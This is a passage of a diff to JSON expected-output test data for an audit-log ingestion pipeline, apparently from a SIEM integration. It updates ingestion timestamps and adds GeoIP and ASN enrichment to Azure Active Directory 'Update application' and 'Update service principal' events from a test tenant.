@@ -14804,7 +15740,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125287500Z", + "ingested": "2021-12-14T14:48:43.176732540Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -14831,6 +15767,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -14975,7 +15923,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125291600Z", + "ingested": "2021-12-14T14:48:43.176733267Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -15002,6 +15950,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -15155,7 +16115,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125297300Z", + "ingested": "2021-12-14T14:48:43.176734009Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozi
lla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -15182,6 +16142,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -15335,7 +16307,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125302100Z", + "ingested": "2021-12-14T14:48:43.176734648Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozi
lla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -15362,6 +16334,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -15515,7 +16499,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125306400Z", + "ingested": "2021-12-14T14:48:43.176735262Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozi
